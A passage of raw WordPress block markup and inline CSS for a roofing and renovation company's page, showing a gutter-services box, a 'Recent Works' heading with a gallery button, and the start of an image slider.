\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"4b500be0-2fa9-4b01-a853-bfde34656538\"} -->\n<style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">call today for a free estimate on new seamless aluminum gutters by Dunrite..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"44c2922d-ade1-4071-bb8d-5dc07c7e63b3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0bcd67a1-1acd-4911-bbab-bd2854964ee9\"} -->\n<style type=\"text/css\"> .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"15c717c2-2df6-496f-b0aa-89c7ee7b446a\"} -->\n<style type=\"text/css\"> .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-15c717c2-2df6-496f-b0aa-89c7ee7b446a\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"78c9592b-fe97-4617-9b42-3a70d0b149cd\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-78c9592b-fe97-4617-9b42-3a70d0b149cd {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-78c9592b-fe97-4617-9b42-3a70d0b149cd\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://dunriteroof.com/gallery\",\"counterId\":\"11786986-9ed9-4821-ad31-449ab6ed726b\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-11786986-9ed9-4821-ad31-449ab6ed726b skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/gallery\" rel=\"noopener noreferrer\" target=\"_blank\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\"} -->\n<style type=\"text/css\"> .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9d6d8012-2247-4f78-8ef6-c5bc8be6d7ee\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"0c0b2954-7402-4523-850f-a32279216940\"} -->\n<style type=\"text/css\"> .block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-0c0b2954-7402-4523-850f-a32279216940 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-0c0b2954-7402-4523-850f-a32279216940 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-0c0b2954-7402-4523-850f-a32279216940 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" 